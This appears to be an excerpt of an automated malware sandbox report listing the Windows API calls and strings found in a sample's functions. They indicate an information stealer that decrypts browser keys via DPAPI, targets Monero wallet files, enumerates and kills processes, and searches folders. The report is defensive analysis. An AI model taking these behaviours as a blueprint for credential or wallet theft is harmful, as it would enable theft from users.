                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        APIs
                        • memset.MSVCRT ref: 005F94EB
                          • Part of subcall function 005F8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,005F951E,00000000), ref: 005F8D5B
                          • Part of subcall function 005F8D50: RtlAllocateHeap.NTDLL(00000000), ref: 005F8D62
                          • Part of subcall function 005F8D50: wsprintfW.USER32 ref: 005F8D78
                        • OpenProcess.KERNEL32(00001001,00000000,?), ref: 005F95AB
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 005F95C9
                        • CloseHandle.KERNEL32(00000000), ref: 005F95D6
                        Similarity
                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                        • String ID:
                        APIs
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006005B7), ref: 005F86CA
                        • Process32First.KERNEL32(?,00000128), ref: 005F86DE
                        • Process32Next.KERNEL32(?,00000128), ref: 005F86F3
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                        • CloseHandle.KERNEL32(?), ref: 005F8761
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00600E00,00000000,?), ref: 005F79B0
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F79B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,00600E00,00000000,?), ref: 005F79C4
                        • wsprintfA.USER32 ref: 005F79F3
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        APIs
                        • __getptd.LIBCMT ref: 005FC74E
                          • Part of subcall function 005FBF9F: __amsg_exit.LIBCMT ref: 005FBFAF
                        • __getptd.LIBCMT ref: 005FC765
                        • __amsg_exit.LIBCMT ref: 005FC773
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 005FC797
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        APIs
                          • Part of subcall function 005F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 005F8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 005F4F7A
                        • lstrcat.KERNEL32(?,00601070), ref: 005F4F97
                        • lstrcat.KERNEL32(?,01159258), ref: 005F4FAB
                        • lstrcat.KERNEL32(?,00601074), ref: 005F4FBD
                          • Part of subcall function 005F4910: wsprintfA.USER32 ref: 005F492C
                          • Part of subcall function 005F4910: FindFirstFileA.KERNEL32(?,?), ref: 005F4943
                          • Part of subcall function 005F4910: StrCmpCA.SHLWAPI(?,00600FDC), ref: 005F4971
                          • Part of subcall function 005F4910: StrCmpCA.SHLWAPI(?,00600FE0), ref: 005F4987
                          • Part of subcall function 005F4910: FindNextFileA.KERNEL32(000000FF,?), ref: 005F4B7D
                          • Part of subcall function 005F4910: FindClose.KERNEL32(000000FF), ref: 005F4B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0